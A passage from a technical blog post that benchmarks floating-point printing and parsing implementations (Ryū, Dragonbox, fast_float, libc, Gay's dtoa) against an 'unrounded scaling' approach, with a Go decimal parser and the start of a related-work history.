<tr><td><a href="fpfmt/plot/fpfmt-ryzen-fixed6-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed6-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed6-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed6-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed6-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-fixed6-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed6-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed6-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed6-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed6-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
For short output, various special-case optimizations are possible
to avoid bignums, and the scatterplots make clear that
all the implementations do that,
except for Linux glibc.
It surprises me that both libc implementations are so much slower
than David Gay’s original dtoa from 1990 (dmg1997).
I expected that any new attempt at floating-point printing
would at least make sure it was as fast as the canonical
reference implementation.
<p>
Here are the results for 17-digit output:
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table3>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-apple-fixed17-scat.png 1x, fpfmt/plot/fpfmt-apple-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed17-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-apple-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-apple-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-fixed17-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-fixed17-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-scat.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@4x.png 4x, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6.png 6, fpfmt/plot/fpfmt-ryzen-fixed17-scat@6x2.png 6x2"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-fixed17-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-fixed17-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-fixed17-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-fixed17-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
In this case, fewer optimizations are available,
and libc has a winged scatterplot on both systems.
The dblconv library has a fast path that can be taken
about 99% of the time, but the scatterplot shows a shadow
of a wing for the remaining 1%.
The CDFs show the bignum-based implementations clearly:
they are slower and have a more gradual slope.
We can also read off the CDFs that dmg2017’s
table-based fast path handles about 95% of the inputs.
<p>
In general, fast fixed-width printing has not seen much
optimization attention.
Unrounded scaling almost has the field to itself
and is significantly faster than the other implementations.
<a class=anchor href="#shortest-width_performance"><h3 id="shortest-width_performance">Shortest-Width Performance</h3></a>
<p>
For shortest-width printing, I used the same set of random inputs as for fixed-width printing.
The implementations are:
<ul>
<li>
<b>dblconv</b>: Loitsch’s <a href="https://github.com/google/double-conversion">double-conversion library</a>, using the <code>ToShortest</code> function.
It uses the Grisu3 algorithm [<a class=footref id='fnref-23-2' href='#fn-23'>23</a>].
<li>
<b>dmg1997</b>: Gay’s 1997 <code>dtoa.c</code> in shortest-output mode.
<li>
<b>dmg2017</b>: Gay’s 2017 <code>dtoa.c</code> in shortest-output mode.
<li>
<b>dragonbox</b>: Jeon’s <a href="https://github.com/jk-jeon/dragonbox">dragonbox library</a>, using the <code>jkj::dragonbox::to_chars</code> function.
It uses the Dragonbox algorithm [<a class=footref id='fnref-17-2' href='#fn-17'>17</a>].
<li>
<b>ryu</b>: Adams’s <a href="https://github.com/ulfjack/ryu">Ryū library</a>, using the <code>d2s_buffered</code> function.
It uses the Ryü algorithm [<a class=footref id='fnref-2-2' href='#fn-2'>2</a>].
<li>
<b>schubfach</b>: A C++ translation of Giulietti’s Java implementation of Schubfach [<a class=footref id='fnref-12-2' href='#fn-12'>12</a>].
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code for <code>Short</code> and <code>Fmt</code> in this post.
<li>
<b>uscalec</b>: A C translation of the unrounded scaling Go code.</ul>
<p>
All these implementations are running different code than for fixed-width printing.
The C library does not provide shortest-width printing,
so there is no libc implementation to compare against.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table4>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-short-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-short-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-short-scat.png" srcset="fpfmt/plot/fpfmt-apple-short-scat.png 1x, fpfmt/plot/fpfmt-apple-short-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-short-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-short-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-short-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-short-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-short-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-short-cdf.png" srcset="fpfmt/plot/fpfmt-apple-short-cdf.png 1x, fpfmt/plot/fpfmt-apple-short-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-short-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-short-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-short-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-short-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-short-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-short-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-short-scat.png 1x, fpfmt/plot/fpfmt-ryzen-short-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-short-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-short-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-short-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-short-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-short-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-short-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-short-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-short-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-short-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-short-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-short-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
There is much more competition here.
Other than Gay’s 1990 dtoa, everything runs quickly.
From the CDFs, we can see that Gay’s 2017 dtoa fast path runs about 85% of the time.
The C and Go unrounded scalings run at about the same speed as Ryū
but a bit slower than Dragonbox.
This turns out to be due mainly to Dragonbox’s digit formatter,
not the actual floating-point conversion.
<p>
To remove digit formatting from the comparison, I ran a set of benchmarks
of just <code>Short</code> (which returns an integer, not a digit string)
and equivalent code from Dragonbox, Schubfach, and Ryū.
For Dragonbox, I used <code>jkj::dragonbox::to_decimal</code>.
For Schubfach and Ryū, I added new entry points that
return the integer and exponent instead of formatting them.
Schubfach delayed the trimming of zeros until after formatting,
so I added a call to the <code>trimZeros</code> used by <code>Short</code>,
which is in turn similar to the one used in Dragonbox.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table5>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-shortraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-shortraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-shortraw-scat.png" srcset="fpfmt/plot/fpfmt-apple-shortraw-scat.png 1x, fpfmt/plot/fpfmt-apple-shortraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-shortraw-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-shortraw-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-shortraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-shortraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-shortraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-shortraw-cdf.png" srcset="fpfmt/plot/fpfmt-apple-shortraw-cdf.png 1x, fpfmt/plot/fpfmt-apple-shortraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-shortraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-shortraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-shortraw-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-shortraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-shortraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-shortraw-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-shortraw-scat.png 1x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-shortraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-shortraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-shortraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-shortraw-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-shortraw-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-shortraw-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
The difference between these plots and the previous ones show that
most of Dragonbox’s apparent speed before was in its digit formatter,
not in the actual binary-to-decimal conversion.
<a href="https://github.com/jk-jeon/dragonbox/blob/e4a85ebee62750382bc7d1eef4bb72f9696d073f/source/dragonbox_to_chars.cpp">That converter</a> effectively has
different straight-line code path for each number length.
It’s not surprising that it’s faster,
but it’s more code than I’m willing to stomach myself.
<p>
The scatterplots show that the Ryū code’s special case for integer inputs
helps for a few inputs (at the bottom of the plot) but runs slower than
the general case for more inputs (at the top of the plot).
On the other hand, the vertical lines of blue points near <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>500</mn></msup></mrow></math>
and <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>700</mn></msup></mrow></math> are likely not algorithmic,
nor is the vertical line of black points near <math><mrow><mn>2</mn><msup><mspace height='0.66em' /><mn>100</mn></msup></mrow></math>.
Both appear to be some kind of bad Apple M4 interaction when accessing a
specific table entry.
The specific inputs are executed in random order,
so a clustering like this is not interference like
a single overloaded moment on the machine.
For a given built executable, the slow inputs are consistent;
as the code and data sections move around when the program
is changed, the slow inputs move too.
There is also a general phenomenon that if you sample 10,000
points, some of them will run slower than others due to
random hardware interactions.
All this is to say that the tails of the CDFs
for these very quick operations are not entirely trustworthy.
<p>
On a more reliable note,
the CDFs show that Dragonbox has a fast path is taken about 60% of the time
and runs faster than unrounded scaling,
but the cost of that check is to make the remaining 40% slower
than unrounded scaling.
On average, they are about the same,
but unrounded scaling is more consistent and less code.
<p>
Overall, unrounded scaling runs faster than or at the same speed as
the others,
especially when focusing on the core conversion.
When formatting text, Dragonbox runs faster, but only because
of its digit formatting code, not the code we are focusing on
in this post.
<a class=anchor href="#parsing_text"><h3 id="parsing_text">Parsing Text</h3></a>
<p>
Like for printing, to compare against other parsing implementations
we need code to handle text, not just the integers passed to <code>Parse</code>.
Here is the parser I used.
It could be improved to handle arbitrary numbers of leading and trailing zeros,
negative numbers, and special values like zero, infinity and NaN,
but it is close enough for our purposes.
It is essentially a direct translation of the regular expression
<code>[0-9]*(\.[0-9]*)?([Ee][+-]?[0-9]*)</code>,
with checks on the digit counts.
<div class=showcode><pre><span class=showcode-comment>// ParseText parses a decimal string s</span>
<span class=showcode-comment>// and returns the nearest floating point value.</span>
<span class=showcode-comment>// It returns 0, false if the input s is malformed.</span>
func ParseText(s []byte) (f float64, ok bool) {
isDigit := func(c byte) bool { return c-'0' <= 9 }
<span class=showcode-comment>// Read digits.</span>
const maxDigits = 19
d := uint64(0) <span class=showcode-comment>// decimal value of digits</span>
frac := 0 <span class=showcode-comment>// count of digits after decimal point</span>
i := 0
for ; i < len(s) && isDigit(s[i]); i++ {
d = d*10 + uint64(s[i]) - '0'
}
if i > maxDigits {
return <span class=showcode-comment>// too many digits</span>
}
if i < len(s) && s[i] == '.' {
i++
for ; i < len(s) && isDigit(s[i]); i++ {
d = d*10 + uint64(s[i]) - '0'
frac++
}
if i == 1 || i > maxDigits+1 {
return <span class=showcode-comment>// no digits or too many digits</span>
}
}
if i == 0 {
return <span class=showcode-comment>// no digits</span>
}
<span class=showcode-comment>// Read exponent.</span>
p := 0
if i < len(s) && (s[i] == 'e' || s[i] == 'E') {
i++
sign := +1
if i < len(s) {
if s[i] == '-' {
sign = -1
i++
} else if s[i] == '+' {
i++
}
}
if i >= len(s) || len(s)-i > 3 {
return <span class=showcode-comment>// missing or too large exponent</span>
}
for ; i < len(s) && isDigit(s[i]); i++ {
p = p*10 + int(s[i]) - '0'
}
p *= sign
}
if i != len(s) {
return <span class=showcode-comment>// junk on end</span>
}
return Parse(d, p-frac), true
}</pre></div><div class=showcode-src><a href="https://github.com/rsc/fpfmt/blob/blog1/fpfmt.go#L140-L195">fpfmt/fpfmt.go:140,195</a></div><div class=showcode-end></div>
<a class=anchor href="#parsing_performance"><h3 id="parsing_performance">Parsing Performance</h3></a>
<p>
Now we can compare <code>Parse</code> to other implementations.
I generated 10,000 random inputs,
each of which was a random 19-digit sequence
with a decimal point after the first digit,
along with a random decimal exponent in the range [-300, 300].
(The full float64 decimal exponent range is [-308, 308],
but narrowing it avoids generating numbers
that underflow to 0 or overflow to infinity.)
<p>
The implementations are:
<ul>
<li>
<b>abseil</b>: The <a href="https://github.com/abseil/abseil-cpp">Abseil library</a>, using <code>absl::from_chars</code> as of November 2025 (commit 48bf10f142). <a href="https://github.com/abseil/abseil-cpp/blob/20250814.1/absl/strings/charconv.cc">It uses</a> the Eisel-Lemire algorithm [<a class=footref id='fnref-22-2' href='#fn-22'>22</a>].
<li>
<b>libc</b>: The C library’s <code>strtod</code>. <a href="https://github.com/bminor/glibc/blob/glibc-2.39/stdlib/strtod_l.c">Linux glibc uses</a> a bignum-based algorithm,
while <a href="https://github.com/apple-oss-distributions/Libc/blob/Libc-1725.40.4/stdlib/strtofp.c">macOS 26 libc uses</a> the Eisel-Lemire algorithm.
<li>
<b>dblconv</b>: The <a href="https://github.com/google/double-conversion">double-conversion library</a>’s <code>StringToDouble</code> function. It uses Clinger’s algorithm [<a class=footref id='fnref-6' href='#fn-6'>6</a>] with simulated floating-point
using 64-bit mantissas.
<li>
<b>dmg1997</b>: Gay’s 1997 strtod, from <code>dtoa.c</code> in 1997.
It uses Clinger’s algorithm with hardware floating-point (float64s).
<li>
<b>dmg2017</b>: Gay’s 2017 strtod, from <code>dtoa.c</code> in 2017.
It uses Clinger’s algorithm with simulated floating-point using 96-bit mantissas.
<li>
<b>fast_float</b>: Lemire’s <a href="https://github.com/fastfloat/fast_float">fast_float library</a>, using the <code>fast_float::from_chars</code> function. Unsurprisingly, it uses the Eisel-Lemire algorithm.
<li>
<b>uscale</b>: The unrounded scaling approach, using the Go code for <code>Parse</code> and <code>Unfmt</code> in this post.
<li>
<b>uscalec</b>: A C translation of the Go code in this post.</ul>
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table6>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-parse-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-parse-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-parse-scat.png" srcset="fpfmt/plot/fpfmt-apple-parse-scat.png 1x, fpfmt/plot/fpfmt-apple-parse-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parse-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-parse-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-parse-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-parse-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-parse-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-parse-cdf.png" srcset="fpfmt/plot/fpfmt-apple-parse-cdf.png 1x, fpfmt/plot/fpfmt-apple-parse-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parse-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-parse-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-parse-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-parse-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parse-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-parse-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-parse-scat.png 1x, fpfmt/plot/fpfmt-ryzen-parse-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parse-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parse-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parse-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-parse-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parse-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-parse-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-parse-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-parse-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parse-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parse-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parse-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
The surprise here is the macOS libc, which is competitive with unrounded scaling and fast_float.
It turns out that macOS 26 shipped a new strtod based on the Eisel-Lemire algorithm.
<p>
Once again, to isolate the actual conversion from the text processing,
I also benchmarked <code>Parse</code> and equivalent code from fast_float.
</div></div>
<div class=main-wide>
<style>
</style>
<table class=md id=_table7>
<tr class=th><th></th><th></th></tr>
<tr><td><a href="fpfmt/plot/fpfmt-apple-parseraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-apple-parseraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-apple-parseraw-scat.png" srcset="fpfmt/plot/fpfmt-apple-parseraw-scat.png 1x, fpfmt/plot/fpfmt-apple-parseraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parseraw-scat@2x.png 2x, fpfmt/plot/fpfmt-apple-parseraw-scat@3x.png 3x, fpfmt/plot/fpfmt-apple-parseraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-apple-parseraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-apple-parseraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-apple-parseraw-cdf.png" srcset="fpfmt/plot/fpfmt-apple-parseraw-cdf.png 1x, fpfmt/plot/fpfmt-apple-parseraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-apple-parseraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-apple-parseraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-apple-parseraw-cdf@4x.png 4x"></a></td></tr>
<tr><td><a href="fpfmt/plot/fpfmt-ryzen-parseraw-scat-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parseraw-scat" class="center pad" width=600 height=300 src="fpfmt/plot/fpfmt-ryzen-parseraw-scat.png" srcset="fpfmt/plot/fpfmt-ryzen-parseraw-scat.png 1x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parseraw-scat@4x.png 4x"></a></td><td><a href="fpfmt/plot/fpfmt-ryzen-parseraw-cdf-big.svg"><img name="fpfmt/plot/fpfmt-ryzen-parseraw-cdf" class="center pad" width=400 height=300 src="fpfmt/plot/fpfmt-ryzen-parseraw-cdf.png" srcset="fpfmt/plot/fpfmt-ryzen-parseraw-cdf.png 1x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@1.5x.png 1.5x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@2x.png 2x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@3x.png 3x, fpfmt/plot/fpfmt-ryzen-parseraw-cdf@4x.png 4x"></a></td></tr>
</table>
</div>
<div class=main><div class=article>
<p>
I don’t understand the notch in the Go uscale on macOS,
nor do I understand why the C uscale is faster than fast_float on macOS
but only about the same speed on Linux.
Since each conversion takes only a few nanoseconds,
the answer may be subtle microarchitectural effects
that I’m not particularly skilled at chasing down.
<p>
Overall,
unrounded scaling is faster than—or in one case tied with—the other known
algorithms for converting floating-point numbers
to and from decimal representations.
<a class=anchor href="#related"><h2 id="related">Related Work</h2></a>
<blockquote>
<p>
The story is told of G. H. Hardy (and of other people) that during a lecture
he said “It is obvious. . . <i>Is</i> it obvious?” left the room, and returned fifteen minutes
later, saying “Yes, it’s obvious.”
I was present once when Rogosinski asked Hardy whether the story were true.
Hardy would admit only that he might have said “It’s obvious. . . <i>Is</i> it obvious?” (brief pause)
“Yes, it’s obvious.” <br>
— Ralph P. Boas, Jr., <i>Lion Hunting and Other Mathematical Pursuits</i></blockquote><blockquote>
<p>
If I have seen further, it is by standing on the shoulders of giants. <br>
— Isaac Newton</blockquote><blockquote>
<p>
So I picked up my staff <br>
And I followed the trail <br>
Of his smoke to the mouth of the cave <br>
And I bid him come out <br>
Yea, forsooth, I did shout <br>
“Ye fool dragon, be gone! Or behave!” <br>
— Marsha Norman, <i>The Secret Garden</i> (musical)</blockquote>
<p>
People have been studying the problem of floating-point printing
and parsing since the late 1940s.
The solutions in this post, based on a fast, accurate unrounded scaling primitive,
may seem obvious in retrospect,
but they were certainly not obvious to me when I started down this trail.
Nor were they obvious to the many people
who studied this problem before, or we’d already be using these faster, simpler algorithms!
As is often the case in computer science,
the algorithms in this post
connect individual ideas that have been known for decades.
This section traces the history of the relevant ideas.
<p>
The companion post “<a href="fp-proof">Fast Unrounded Scaling: Proof by Ivy</a>” has
its own <a href="fp-proof#related">related work section</a>
that covers the history of proofs that a table of
128-bit powers of ten is sufficient for accurate results.
<a class=anchor href="#related.fixed"><h3 id="related.fixed">Fixed-Point Printing</h3></a>
<p>
The earliest binary/decimal conversions in the literature are probably
the ones in Goldstein and Von Neumann’s 1947
<i>Planning and Coding Problems for an Electronic Computing Instrument</i> [<a class=footref id='fnref-13' href='#fn-13'>13</a>].
They converted one digit at a time by repeated multiplication by 10
and modulo by 1,
as did many conversions that followed.
<p>
The alternative to repeated multiplication by 10
is multiplication by a single larger power of 10,
as we did in this post.
Many early systems did that as well.
In a 1966 article in <i>CACM</i>, Mancino [<a class=footref id='fnref-24' href='#fn-24'>24</a>]
summarized the state of the art:
“Decimal-to-binary and binary-to-decimal
floating-point conversion is often performed by using a table of the powers
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>i</mi></msup></mrow></math> (<math><mi>i</mi></math> a positive integer) for converting from base 10 to base
2, and by using a table of the coefficients of a polynomial
approximation of <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>x</mi></msup></mrow></math> <math><mrow><mo stretchy=false>(</mo><mn>0</mn><mo>≤</mo><mi>x</mi><mo><</mo><mn>1</mn><mo stretchy=false>)</mo></mrow></math> for converting from base
2 to base 10.”
Mancino’s article then showed that the powers-of-10 table could be
used for binary-to-decimal as well
and also discussed reducing its size.
<p>
During the development of IEEE 754 floating-point, Coonen published
an implementation guide [<a class=footref id='fnref-7' href='#fn-7'>7</a>] that defined
conversions in both directions using powers of 10 constructed on demand.
The powers <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mi>p</mi></msup></mrow></math> for <math><mrow><mn>1</mn><mo>≤</mo><mi>p</mi><mo>≤</mo><mn>27</mn></mrow></math> can be computed exactly,
and then Coonen suggested storing a table containing
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>54</mn></msup></mrow></math>, <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>108</mn></msup></mrow></math>, and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>216</mn></msup></mrow></math>,
so that any power up to <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>308</mn></msup></mrow></math> can be
constructed as the product of at most three multiplications
involving at most two inexact values.
Coonen computed an approximate <math><mi>p</mi></math> using a different
approximation to <math><mrow><mtext>log</mtext><msub><mspace height='0em' /><mn>2</mn></msub></mrow></math>;
if it was off by one, he repeated the process with <math><mi>p</mi></math>
incremented or decremented by 1.
The result was not exact but was provably within a very small
error margin, which became IEEE754’s required
conversion accuracy.
Coonen’s thesis [<a class=footref id='fnref-9' href='#fn-9'>9</a>] improved on that error margin
by changing the table to contain the exceptionally accurate powers
<math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>55</mn></msup></mrow></math>, <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>108</mn></msup></mrow></math>, and <math><mrow><mn>10</mn><msup><mspace height='0.66em' /><mn>206</mn></msup></mrow></math>,
improved the log approximation,
and discussed how to use the floating-point hardware’s
rounding modes and inexact flag to reduce the error further.
In some ways, unrounded scaling is similar to
the hardware Coonen shows in this diagram from Chapter 2:
<p>
<img name="fpfmt-coonen1" class="center pad" width=396 height=252 src="fpfmt-coonen1.png" srcset="fpfmt-coonen1.png 1x, fpfmt-coonen1@1.5x.png 1.5x, fpfmt-coonen1@2x.png 2x">
<p>
The main difference is that unrounded scaling uses enough precision
to avoid any error at all,
that some of the chopped bits are discarded entirely
rather than feeding into the inexact flag (the sticky bit),
and all the details have to be implemented in software
instead of relying on floating-point hardware.
In an appendix to his thesis, Coonen also defined
bignum-based exact conversion routines
written in Pascal.
(It would be interesting to translate them to C and
add them to the benchmarks above!)
<p>
1990 was the <i>annus mirabilis</i> of floating-point formatting.
In April, Slishman [<a class=footref id='fnref-29' href='#fn-29'>29</a>] published table-based algorithms
for printing and parsing at fixed precision.
The algorithms computed 16 additional bits of precision,
falling back to a bignum-based implementation only
when those 16 bits were all 1’s.
This is analogous to unrounded scaling’s check
for whether the middle bits are all 0’s
and appears to be the earliest analysis of the effect
of error carries on the eventual result.
(Slishman used a table of powers rounded down,
while unrounded scaling uses a table of powers rounded up,
so the overflow conditions are inverted.)
<p>
In June at the ACM PLDI conference, Steele and White published
“How to Print Floating-Point Numbers Accurately” [<a class=footref id='fnref-30-2' href='#fn-30'>30</a>]
(and Clinger also published “How to Read Floating Point Numbers Accurately” [<a class=footref id='fnref-6-2' href='#fn-6'>6</a>], discussed later).
Although the paper is mainly cited for shortest-width formatting,
Steele and White do discuss fixed-width formatting briefly.
Their algorithms use repeated multiplication by 10
instead of a table.
<p>
In November, Gay [<a class=footref id='fnref-11-2' href='#fn-11'>11</a>] published important optimizations for
both printing and parsing
but left the basic algorithms unmodified.
Gay also published a portable, freely redistributable C implementation.
As noted earlier, that implementation is probably one of the
most widely copied software libraries ever.
<p>
